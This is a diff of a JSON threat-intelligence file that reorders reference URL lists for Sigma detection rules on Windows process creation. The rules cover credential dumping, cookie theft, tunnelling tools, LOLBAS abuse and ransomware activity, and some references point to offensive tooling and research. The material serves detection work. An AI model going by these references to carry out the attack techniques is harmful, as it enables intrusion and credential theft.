"https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw", + "https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_11882.yml" ], "tags": [ @@ -54040,10 +54040,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://adsecurity.org/?p=2604", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/", + "https://adsecurity.org/?p=2604", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml" ], "tags": [ @@ -54076,9 +54076,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA", "https://twitter.com/pabraeken/status/990717080805789697", "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", - "https://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_runonce_execution.yml" ], "tags": [ @@ -54195,11 +54195,11 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/Wietze/status/1542107456507203586", - "https://twitter.com/pythonresponder/status/1385064506049630211?s=21", + "https://twitter.com/shantanukhande/status/1229348874298388484", "https://twitter.com/Hexacorn/status/1224848930795552769", + "https://twitter.com/pythonresponder/status/1385064506049630211?s=21", "https://twitter.com/SBousseaden/status/1167417096374050817", "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", - "https://twitter.com/shantanukhande/status/1229348874298388484", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml" ], "tags": [ @@ -54235,16 +54235,16 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", - "https://bunnyinside.com/?term=f71e8cb9c76a", - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "http://managed670.rssing.com/chan-5590147/all_p1.html", - "https://twitter.com/_xpn_/status/1268712093928378368", - "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://twitter.com/_xpn_/status/1268712093928378368", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://bunnyinside.com/?term=f71e8cb9c76a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_modification_cmdline.yml" ], "tags": [ @@ -54432,8 +54432,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://www.d7xtech.com/free-software/runx/", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_runx_as_system.yml" ], "tags": [ @@ -54467,9 +54467,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/", "https://twitter.com/pabraeken/status/990758590020452353", - "https://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" ], "tags": [ @@ -54502,9 +54502,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/", "https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/", "https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js", - "https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_koadic.yml" ], "tags": [ @@ -54620,8 +54620,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#atomic-test-2---malicious-user-agents---cmd", "https://curl.se/docs/manpage.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#atomic-test-2---malicious-user-agents---cmd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_useragent.yml" ], "tags": [ @@ -54710,8 +54710,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", "https://github.com/Azure/Azure-Sentinel/blob/43e9be273dca321295190bfc4902858e009d4a35/Detections/MultipleDataSources/SOURGUM_IOC.yaml", + "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", "https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_sourgrum.yml" ], @@ -54788,10 +54788,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/vysecurity/status/873181705024266241", + "https://lolbas-project.github.io/lolbas/Binaries/Rpcping/", "https://twitter.com/vysecurity/status/974806438316072960", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)", - "https://lolbas-project.github.io/lolbas/Binaries/Rpcping/", - "https://twitter.com/vysecurity/status/873181705024266241", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rpcping.yml" ], "tags": [ @@ -54859,8 +54859,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", + "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" ], "tags": [ @@ -54901,9 +54901,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/", "https://blog.sekoia.io/lucky-mouse-incident-response-to-detection-engineering/", "https://github.com/jpillora/chisel/", - "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chisel_usage.yml" ], "tags": [ @@ -54993,8 +54993,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/pabraeken/status/993497996179492864", "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml", + "https://twitter.com/pabraeken/status/993497996179492864", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vboxdrvinst.yml" ], "tags": [ @@ -55094,9 +55094,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/", - "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_disable_defender_av_security_monitoring.yml" ], "tags": [ @@ -55187,8 +55187,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/outflanknl/Dumpert", "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", + "https://github.com/outflanknl/Dumpert", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_dumpert.yml" ], "tags": [ @@ -55346,8 +55346,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/", "https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter", + "https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_credential_access_via_password_filter.yml" ], "tags": [ @@ -55489,8 +55489,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/clip", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/clip", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_clip.yml" ], "tags": [ @@ -55581,9 +55581,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", "https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps", "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", + "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_web_request_cmd_and_cmdlets.yml" ], "tags": [ @@ -55650,9 +55650,9 @@ "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/", - "https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/", "https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/", "https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/", + "https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_emotet.yml" ], "tags": [ @@ -55825,9 +55825,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.intrinsec.com/apt27-analysis/", "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://www.intrinsec.com/apt27-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml" ], "tags": [ @@ -55973,8 +55973,8 @@ "logsource.product": "windows", "refs": [ "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5", - "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/", "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", + "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml" ], "tags": [ @@ -56007,8 +56007,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://ss64.com/nt/mklink.html", "https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1546.008/T1546.008.md", + "https://ss64.com/nt/mklink.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_create_link_osk_cmd.yml" ], "tags": [ @@ -56032,8 +56032,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100", "https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100", + "https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_http_appdata.yml" ], "tags": [ @@ -56150,9 +56150,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", "https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2", "https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/", + "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_darkside_ransomware.yml" ], "tags": [ @@ -56296,8 +56296,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", "https://attack.mitre.org/software/S0246/ (Lazarus HARDRAIN)", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add.yml" ], "tags": [ @@ -56330,8 +56330,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.011/T1218.011.md", "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.011/T1218.011.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_script_run.yml" ], "tags": [ @@ -56422,10 +56422,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://github.com/antonioCoco/RogueWinRM", "https://twitter.com/Cyb3rWard0g/status/1453123054243024897", + "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", + "https://github.com/antonioCoco/RogueWinRM", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml" ], "tags": [ @@ -56459,9 +56459,9 @@ "logsource.product": "windows", "refs": [ "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/", - "https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers", - "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/", "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b", + "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/", + "https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers", "https://www.joesandbox.com/analysis/443736/0/html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_revil_kaseya.yml" ], @@ -56496,8 +56496,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://h.43z.one/ipconverter/", "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", + "https://h.43z.one/ipconverter/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_obfuscated_ip_download.yml" ], "tags": [ @@ -56520,9 +56520,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", - "https://redcanary.com/threat-detection-report/", "https://www.cobaltstrike.com/help-windows-executable", + "https://redcanary.com/threat-detection-report/", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml" ], "tags": [ @@ -56634,10 +56634,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files", - "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/", "https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks", + "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/", "https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing", + "https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_selectmyparent.yml" ], "tags": [ @@ -56671,8 +56671,8 @@ "logsource.product": "windows", "refs": [ "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", - "https://twitter.com/splinter_code/status/1483815103279603714", "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://twitter.com/splinter_code/status/1483815103279603714", "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun_priv_user.yml" ], @@ -56694,8 +56694,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/azure/dns/dns-zones-records", "https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/", + "https://docs.microsoft.com/en-us/azure/dns/dns-zones-records", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml" ], @@ -56754,8 +56754,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/SwiftOnSecurity/status/1455897435063074824", "https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/", + "https://twitter.com/SwiftOnSecurity/status/1455897435063074824", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cmdl32.yml" ], "tags": [ @@ -56797,8 +56797,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets", "https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets", "https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml" ], @@ -56935,8 +56935,8 @@ "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Rasautou/", - "https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html", "https://github.com/fireeye/DueDLLigence", + "https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml" ], "tags": [ @@ -57002,9 +57002,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/tevora-threat/SharpView/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview", "https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview", + "https://github.com/tevora-threat/SharpView/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml" ], "tags": [ @@ -57055,8 +57055,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", + "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_iss_module_install.yml" ], "tags": [ @@ -57080,8 +57080,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29", "https://learn.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control", + "https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29", "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_conhost_option.yml" ], @@ -57182,8 +57182,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://attack.mitre.org/software/S0108/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md", + "https://attack.mitre.org/software/S0108/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_dll_persistence.yml" ], "tags": [ @@ -57241,8 +57241,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://tools.thehacker.recipes/mimikatz/modules", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mimikatz_command_line.yml" ], "tags": [ @@ -57366,8 +57366,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/", "https://github.com/defaultnamehere/cookie_crimes/", + "https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/", "https://mango.pdf.zone/stealing-chrome-cookies-without-a-password", "https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chromium_headless_debugging.yml" @@ -57481,8 +57481,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://pentestlab.blog/2017/03/30/weak-service-permissions/", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://pentestlab.blog/2017/03/30/weak-service-permissions/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_sc_to_change_sevice_image_path_by_non_admin.yml" ], "tags": [ @@ -57508,8 +57508,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html", "https://cyber.wtf/2021/11/15/guess-whos-back/", + "https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_emotet_rundll32_execution.yml" ], "tags": [ @@ -57566,8 +57566,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/6", "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", + "https://github.com/OTRF/detection-hackathon-apt29/issues/6", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdclt_child_process.yml" ], "tags": [ @@ -57600,8 +57600,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.youtube.com/watch?v=ro2QuZTIMBM", "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://www.youtube.com/watch?v=ro2QuZTIMBM", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc_renamed.yml" ], "tags": [ @@ -57624,9 +57624,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444", "https://www.joesandbox.com/analysis/476188/1/iochtml", "https://twitter.com/neonprimetime/status/1435584010202255375", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_control_cve_2021_40444.yml" ], "tags": [ @@ -57659,8 +57659,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", "https://www.hvs-consulting.de/lazarus-report/", + "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_dec20.yml" ], "tags": [ @@ -57694,8 +57694,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution", "https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf", + "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gamaredon_ultravnc.yml" ], "tags": [ @@ -57720,9 +57720,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20", - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2", "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2", + "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_execution.yml" ], "tags": [ @@ -57823,8 